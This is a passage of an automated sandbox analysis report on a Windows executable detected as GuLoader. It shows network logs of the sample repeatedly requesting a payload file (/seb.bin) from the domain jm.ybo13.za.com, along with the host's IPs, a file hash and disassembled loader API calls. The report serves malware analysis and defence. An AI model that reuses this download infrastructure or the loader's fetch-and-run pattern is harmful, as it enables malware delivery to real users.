Nov 5, 2024 16:15:02.954282999 CET	49716	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:02.955530882 CET	80	49716	45.33.20.235	192.168.2.8
Nov 5, 2024 16:15:02.955579042 CET	49716	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:02.956792116 CET	49716	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:02.961664915 CET	80	49716	45.33.20.235	192.168.2.8
Nov 5, 2024 16:15:12.961498976 CET	49717	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:12.967065096 CET	80	49717	45.33.20.235	192.168.2.8
Nov 5, 2024 16:15:12.967200994 CET	49717	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:12.967488050 CET	49717	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:12.972574949 CET	80	49717	45.33.20.235	192.168.2.8
Nov 5, 2024 16:15:13.564771891 CET	80	49717	45.33.20.235	192.168.2.8
Nov 5, 2024 16:15:13.564832926 CET	49717	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:13.565077066 CET	49717	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:13.566235065 CET	80	49717	45.33.20.235	192.168.2.8
Nov 5, 2024 16:15:13.566279888 CET	49717	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:13.571199894 CET	80	49717	45.33.20.235	192.168.2.8
Nov 5, 2024 16:15:23.571075916 CET	49718	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:23.576025009 CET	80	49718	45.33.20.235	192.168.2.8
Nov 5, 2024 16:15:23.576122999 CET	49718	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:23.576354980 CET	49718	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:23.581134081 CET	80	49718	45.33.20.235	192.168.2.8
Nov 5, 2024 16:15:24.172930002 CET	80	49718	45.33.20.235	192.168.2.8
Nov 5, 2024 16:15:24.173234940 CET	49718	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:24.173373938 CET	49718	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:24.178359032 CET	80	49718	45.33.20.235	192.168.2.8
Nov 5, 2024 16:15:24.178428888 CET	49718	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:24.180767059 CET	80	49718	45.33.20.235	192.168.2.8
Nov 5, 2024 16:15:34.180254936 CET	49719	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:34.185170889 CET	80	49719	45.33.20.235	192.168.2.8
Nov 5, 2024 16:15:34.185297012 CET	49719	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:34.185461998 CET	49719	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:34.190442085 CET	80	49719	45.33.20.235	192.168.2.8
Nov 5, 2024 16:15:34.802369118 CET	80	49719	45.33.20.235	192.168.2.8
Nov 5, 2024 16:15:34.802465916 CET	49719	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:34.802726030 CET	49719	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:34.804194927 CET	80	49719	45.33.20.235	192.168.2.8
Nov 5, 2024 16:15:34.804265022 CET	49719	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:34.808070898 CET	80	49719	45.33.20.235	192.168.2.8
Nov 5, 2024 16:15:44.833724976 CET	49720	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:44.838620901 CET	80	49720	45.33.20.235	192.168.2.8
Nov 5, 2024 16:15:44.838985920 CET	49720	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:44.839181900 CET	49720	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:44.844172955 CET	80	49720	45.33.20.235	192.168.2.8
Nov 5, 2024 16:15:45.435466051 CET	80	49720	45.33.20.235	192.168.2.8
Nov 5, 2024 16:15:45.435578108 CET	49720	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:45.435724020 CET	49720	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:45.437103987 CET	80	49720	45.33.20.235	192.168.2.8
Nov 5, 2024 16:15:45.437179089 CET	49720	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:45.440435886 CET	80	49720	45.33.20.235	192.168.2.8
Nov 5, 2024 16:15:55.477637053 CET	49721	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:55.483606100 CET	80	49721	45.33.20.235	192.168.2.8
Nov 5, 2024 16:15:55.483675003 CET	49721	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:55.484808922 CET	49721	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:55.492274046 CET	80	49721	45.33.20.235	192.168.2.8
Nov 5, 2024 16:15:56.075310946 CET	80	49721	45.33.20.235	192.168.2.8
Nov 5, 2024 16:15:56.075437069 CET	49721	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:56.075566053 CET	49721	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:56.077133894 CET	80	49721	45.33.20.235	192.168.2.8
Nov 5, 2024 16:15:56.077192068 CET	49721	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:15:56.080387115 CET	80	49721	45.33.20.235	192.168.2.8
Nov 5, 2024 16:16:06.090290070 CET	49722	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:16:06.095244884 CET	80	49722	45.33.20.235	192.168.2.8
Nov 5, 2024 16:16:06.095432043 CET	49722	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:16:06.096429110 CET	49722	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:16:06.101361036 CET	80	49722	45.33.20.235	192.168.2.8
Nov 5, 2024 16:16:06.684643984 CET	80	49722	45.33.20.235	192.168.2.8
Nov 5, 2024 16:16:06.684758902 CET	49722	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:16:06.685009956 CET	49722	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:16:06.685761929 CET	80	49722	45.33.20.235	192.168.2.8
Nov 5, 2024 16:16:06.685812950 CET	49722	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:16:06.689992905 CET	80	49722	45.33.20.235	192.168.2.8
Nov 5, 2024 16:16:16.698872089 CET	49723	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:16:16.703926086 CET	80	49723	45.33.20.235	192.168.2.8
Nov 5, 2024 16:16:16.704003096 CET	49723	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:16:16.704794884 CET	49723	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:16:16.709667921 CET	80	49723	45.33.20.235	192.168.2.8
Nov 5, 2024 16:16:17.305033922 CET	80	49723	45.33.20.235	192.168.2.8
Nov 5, 2024 16:16:17.305113077 CET	49723	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:16:17.311438084 CET	80	49723	45.33.20.235	192.168.2.8
Nov 5, 2024 16:16:17.311537981 CET	49723	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:16:17.372359037 CET	49723	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:16:17.377294064 CET	80	49723	45.33.20.235	192.168.2.8
Nov 5, 2024 16:16:27.384116888 CET	49724	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:16:27.391120911 CET	80	49724	45.33.20.235	192.168.2.8
Nov 5, 2024 16:16:27.391268015 CET	49724	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:16:27.391520977 CET	49724	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:16:27.398662090 CET	80	49724	45.33.20.235	192.168.2.8
Nov 5, 2024 16:16:27.980731010 CET	80	49724	45.33.20.235	192.168.2.8
Nov 5, 2024 16:16:27.980874062 CET	49724	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:16:27.981014967 CET	49724	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:16:27.981849909 CET	80	49724	45.33.20.235	192.168.2.8
Nov 5, 2024 16:16:27.981910944 CET	49724	80	192.168.2.8	45.33.20.235
Nov 5, 2024 16:16:27.985851049 CET	80	49724	45.33.20.235	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 5, 2024 16:13:46.252650976 CET	50172	53	192.168.2.8	1.1.1.1
Nov 5, 2024 16:13:46.953506947 CET	53	50172	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 5, 2024 16:13:46.252650976 CET	192.168.2.8	1.1.1.1	0x8321	Standard query (0)	jm.ybo13.za.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 5, 2024 16:13:46.953506947 CET	1.1.1.1	192.168.2.8	0x8321	No error (0)	jm.ybo13.za.com	45.33.20.235	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:13:46.953506947 CET	1.1.1.1	192.168.2.8	0x8321	No error (0)	jm.ybo13.za.com	96.126.123.244	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:13:46.953506947 CET	1.1.1.1	192.168.2.8	0x8321	No error (0)	jm.ybo13.za.com	72.14.185.43	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:13:46.953506947 CET	1.1.1.1	192.168.2.8	0x8321	No error (0)	jm.ybo13.za.com	45.33.2.79	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:13:46.953506947 CET	1.1.1.1	192.168.2.8	0x8321	No error (0)	jm.ybo13.za.com	45.33.18.44	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:13:46.953506947 CET	1.1.1.1	192.168.2.8	0x8321	No error (0)	jm.ybo13.za.com	45.79.19.196	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:13:46.953506947 CET	1.1.1.1	192.168.2.8	0x8321	No error (0)	jm.ybo13.za.com	72.14.178.174	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:13:46.953506947 CET	1.1.1.1	192.168.2.8	0x8321	No error (0)	jm.ybo13.za.com	45.33.23.183	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:13:46.953506947 CET	1.1.1.1	192.168.2.8	0x8321	No error (0)	jm.ybo13.za.com	45.56.79.23	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:13:46.953506947 CET	1.1.1.1	192.168.2.8	0x8321	No error (0)	jm.ybo13.za.com	173.255.194.134	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:13:46.953506947 CET	1.1.1.1	192.168.2.8	0x8321	No error (0)	jm.ybo13.za.com	45.33.30.197	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:13:46.953506947 CET	1.1.1.1	192.168.2.8	0x8321	No error (0)	jm.ybo13.za.com	198.58.118.167	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

jm.ybo13.za.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49708	45.33.20.235	80	8024	C:\Users\user\Desktop\5WP9WCM8qV.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 16:13:46.988059998 CET	167	OUT	GET /seb.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: jm.ybo13.za.com Cache-Control: no-cache
Nov 5, 2024 16:13:48.306051016 CET	185	IN	HTTP/1.1 403 Forbidden server: openresty/1.13.6.1 date: Tue, 05 Nov 2024 15:13:47 GMT content-type: text/html content-length: 1 x-fail-reason: Bad Extension connection: close Data Raw: 20 Data Ascii:
Nov 5, 2024 16:13:48.306562901 CET	185	IN	HTTP/1.1 403 Forbidden server: openresty/1.13.6.1 date: Tue, 05 Nov 2024 15:13:47 GMT content-type: text/html content-length: 1 x-fail-reason: Bad Extension connection: close Data Raw: 20 Data Ascii:
Nov 5, 2024 16:13:48.306689024 CET	185	IN	HTTP/1.1 403 Forbidden server: openresty/1.13.6.1 date: Tue, 05 Nov 2024 15:13:47 GMT content-type: text/html content-length: 1 x-fail-reason: Bad Extension connection: close Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49709	45.33.20.235	80	8024	C:\Users\user\Desktop\5WP9WCM8qV.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 16:13:58.325544119 CET	167	OUT	GET /seb.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: jm.ybo13.za.com Cache-Control: no-cache
Nov 5, 2024 16:13:58.967118979 CET	185	IN	HTTP/1.1 403 Forbidden server: openresty/1.13.6.1 date: Tue, 05 Nov 2024 15:13:58 GMT content-type: text/html content-length: 1 x-fail-reason: Bad Extension connection: close Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49710	45.33.20.235	80	8024	C:\Users\user\Desktop\5WP9WCM8qV.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 16:14:08.983772039 CET	167	OUT	GET /seb.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: jm.ybo13.za.com Cache-Control: no-cache
Nov 5, 2024 16:14:09.808445930 CET	185	IN	HTTP/1.1 403 Forbidden server: openresty/1.13.6.1 date: Tue, 05 Nov 2024 15:14:09 GMT content-type: text/html content-length: 1 x-fail-reason: Bad Extension connection: close Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49711	45.33.20.235	80	8024	C:\Users\user\Desktop\5WP9WCM8qV.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 16:14:19.830996990 CET	167	OUT	GET /seb.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: jm.ybo13.za.com Cache-Control: no-cache
Nov 5, 2024 16:14:20.444678068 CET	185	IN	HTTP/1.1 403 Forbidden server: openresty/1.13.6.1 date: Tue, 05 Nov 2024 15:14:20 GMT content-type: text/html content-length: 1 x-fail-reason: Bad Extension connection: close Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49713	45.33.20.235	80	8024	C:\Users\user\Desktop\5WP9WCM8qV.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 16:14:30.466727972 CET	167	OUT	GET /seb.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: jm.ybo13.za.com Cache-Control: no-cache
Nov 5, 2024 16:14:31.080193996 CET	185	IN	HTTP/1.1 403 Forbidden server: openresty/1.13.6.1 date: Tue, 05 Nov 2024 15:14:31 GMT content-type: text/html content-length: 1 x-fail-reason: Bad Extension connection: close Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49714	45.33.20.235	80	8024	C:\Users\user\Desktop\5WP9WCM8qV.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 16:14:41.093044043 CET	167	OUT	GET /seb.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: jm.ybo13.za.com Cache-Control: no-cache
Nov 5, 2024 16:14:41.699768066 CET	185	IN	HTTP/1.1 403 Forbidden server: openresty/1.13.6.1 date: Tue, 05 Nov 2024 15:14:41 GMT content-type: text/html content-length: 1 x-fail-reason: Bad Extension connection: close Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49715	45.33.20.235	80	8024	C:\Users\user\Desktop\5WP9WCM8qV.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 16:14:51.717046022 CET	167	OUT	GET /seb.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: jm.ybo13.za.com Cache-Control: no-cache
Nov 5, 2024 16:14:52.317378998 CET	185	IN	HTTP/1.1 403 Forbidden server: openresty/1.13.6.1 date: Tue, 05 Nov 2024 15:14:52 GMT content-type: text/html content-length: 1 x-fail-reason: Bad Extension connection: close Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49716	45.33.20.235	80	8024	C:\Users\user\Desktop\5WP9WCM8qV.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 16:15:02.342324972 CET	167	OUT	GET /seb.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: jm.ybo13.za.com Cache-Control: no-cache
Nov 5, 2024 16:15:02.954221010 CET	185	IN	HTTP/1.1 403 Forbidden server: openresty/1.13.6.1 date: Tue, 05 Nov 2024 15:15:02 GMT content-type: text/html content-length: 1 x-fail-reason: Bad Extension connection: close Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49717	45.33.20.235	80	8024	C:\Users\user\Desktop\5WP9WCM8qV.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 16:15:12.967488050 CET	167	OUT	GET /seb.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: jm.ybo13.za.com Cache-Control: no-cache
Nov 5, 2024 16:15:13.564771891 CET	185	IN	HTTP/1.1 403 Forbidden server: openresty/1.13.6.1 date: Tue, 05 Nov 2024 15:15:13 GMT content-type: text/html content-length: 1 x-fail-reason: Bad Extension connection: close Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49718	45.33.20.235	80	8024	C:\Users\user\Desktop\5WP9WCM8qV.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 16:15:23.576354980 CET	167	OUT	GET /seb.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: jm.ybo13.za.com Cache-Control: no-cache
Nov 5, 2024 16:15:24.172930002 CET	185	IN	HTTP/1.1 403 Forbidden server: openresty/1.13.6.1 date: Tue, 05 Nov 2024 15:15:24 GMT content-type: text/html content-length: 1 x-fail-reason: Bad Extension connection: close Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49719	45.33.20.235	80	8024	C:\Users\user\Desktop\5WP9WCM8qV.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 16:15:34.185461998 CET	167	OUT	GET /seb.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: jm.ybo13.za.com Cache-Control: no-cache
Nov 5, 2024 16:15:34.802369118 CET	185	IN	HTTP/1.1 403 Forbidden server: openresty/1.13.6.1 date: Tue, 05 Nov 2024 15:15:34 GMT content-type: text/html content-length: 1 x-fail-reason: Bad Extension connection: close Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49720	45.33.20.235	80	8024	C:\Users\user\Desktop\5WP9WCM8qV.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 16:15:44.839181900 CET	167	OUT	GET /seb.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: jm.ybo13.za.com Cache-Control: no-cache
Nov 5, 2024 16:15:45.435466051 CET	185	IN	HTTP/1.1 403 Forbidden server: openresty/1.13.6.1 date: Tue, 05 Nov 2024 15:15:45 GMT content-type: text/html content-length: 1 x-fail-reason: Bad Extension connection: close Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49721	45.33.20.235	80	8024	C:\Users\user\Desktop\5WP9WCM8qV.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 16:15:55.484808922 CET	167	OUT	GET /seb.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: jm.ybo13.za.com Cache-Control: no-cache
Nov 5, 2024 16:15:56.075310946 CET	185	IN	HTTP/1.1 403 Forbidden server: openresty/1.13.6.1 date: Tue, 05 Nov 2024 15:15:56 GMT content-type: text/html content-length: 1 x-fail-reason: Bad Extension connection: close Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49722	45.33.20.235	80	8024	C:\Users\user\Desktop\5WP9WCM8qV.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 16:16:06.096429110 CET	167	OUT	GET /seb.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: jm.ybo13.za.com Cache-Control: no-cache
Nov 5, 2024 16:16:06.684643984 CET	185	IN	HTTP/1.1 403 Forbidden server: openresty/1.13.6.1 date: Tue, 05 Nov 2024 15:16:06 GMT content-type: text/html content-length: 1 x-fail-reason: Bad Extension connection: close Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49723	45.33.20.235	80	8024	C:\Users\user\Desktop\5WP9WCM8qV.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 16:16:16.704794884 CET	167	OUT	GET /seb.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: jm.ybo13.za.com Cache-Control: no-cache
Nov 5, 2024 16:16:17.305033922 CET	185	IN	HTTP/1.1 403 Forbidden server: openresty/1.13.6.1 date: Tue, 05 Nov 2024 15:16:17 GMT content-type: text/html content-length: 1 x-fail-reason: Bad Extension connection: close Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49724	45.33.20.235	80	8024	C:\Users\user\Desktop\5WP9WCM8qV.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 16:16:27.391520977 CET	167	OUT	GET /seb.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: jm.ybo13.za.com Cache-Control: no-cache
Nov 5, 2024 16:16:27.980731010 CET	185	IN	HTTP/1.1 403 Forbidden server: openresty/1.13.6.1 date: Tue, 05 Nov 2024 15:16:27 GMT content-type: text/html content-length: 1 x-fail-reason: Bad Extension connection: close Data Raw: 20 Data Ascii:

Target ID:	0
Start time:	10:13:26
Start date:	05/11/2024
Path:	C:\Users\user\Desktop\5WP9WCM8qV.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\5WP9WCM8qV.exe"
Imagebase:	0x400000
File size:	538'129 bytes
MD5 hash:	649BA11FD51E50393B1CF0F461B90CBF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1526284301.0000000006145000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:13:36
Start date:	05/11/2024
Path:	C:\Users\user\Desktop\5WP9WCM8qV.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\5WP9WCM8qV.exe"
Imagebase:	0x400000
File size:	538'129 bytes
MD5 hash:	649BA11FD51E50393B1CF0F461B90CBF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.3280318515.0000000003565000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	22.9%
Dynamic/Decrypted Code Coverage:	14%
Signature Coverage:	20.6%
Total number of Nodes:	1511
Total number of Limit Nodes:	44

Executed Functions

Function 004032A0 Relevance: 89.7, APIs: 32, Strings: 19, Instructions: 401
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004032C2
GetVersion.KERNEL32 ref: 004032C8
#17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
OleInitialize.OLE32(00000000), ref: 0040331F
SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\5WP9WCM8qV.exe",00000000), ref: 00403363
CharNextW.USER32(00000000,"C:\Users\user\Desktop\5WP9WCM8qV.exe",00000020), ref: 0040338A

Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C5
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D6
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034E2
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F6
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FE
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350F
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403517
DeleteFileW.KERNELBASE(1033), ref: 0040352B

Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062

OleUninitialize.OLE32(?), ref: 004035F6
ExitProcess.KERNEL32 ref: 00403618
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\5WP9WCM8qV.exe",00000000,?), ref: 0040362B
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\5WP9WCM8qV.exe",00000000,?), ref: 0040363A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\5WP9WCM8qV.exe",00000000,?), ref: 00403645
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\5WP9WCM8qV.exe",00000000,?), ref: 00403651
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040366D
DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
CopyFileW.KERNEL32(C:\Users\user\Desktop\5WP9WCM8qV.exe,0042AA28,00000001), ref: 004036DB
CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
AdjustTokenPrivileges.ADVAPI32 ref: 00403776
ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
ExitProcess.KERNEL32 ref: 004037BE

Strings

C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen, xrefs: 004034A8, 004035C8, 00403673, 0040367D
C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes, xrefs: 004035D3
USERENV, xrefs: 004032F1
1033, xrefs: 00403526
Low, xrefs: 004034F8
~nsu, xrefs: 00403623
UXTHEME, xrefs: 004032E7
Error launching installer, xrefs: 004035AD
SETUPAPI, xrefs: 004032FB
TMP, xrefs: 00403512
\Temp, xrefs: 004034DC
"C:\Users\user\Desktop\5WP9WCM8qV.exe", xrefs: 00403356, 0040335C, 00403553
NSIS Error, xrefs: 00403341
C:\Users\user\Desktop\5WP9WCM8qV.exe, xrefs: 004036D6
C:\Users\user\AppData\Local\Temp\, xrefs: 004034BA, 004034BF, 004034D5, 004034E1, 004034F0, 004034FD, 00403509, 00403511, 00403628, 00403639, 00403644, 00403650, 0040365D, 0040366C, 0040371D
TEMP, xrefs: 0040350A
C:\Users\user\Desktop, xrefs: 0040364A, 0040364F, 0040367C
SeShutdownPrivilege, xrefs: 0040374D
.tmp, xrefs: 0040363F

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

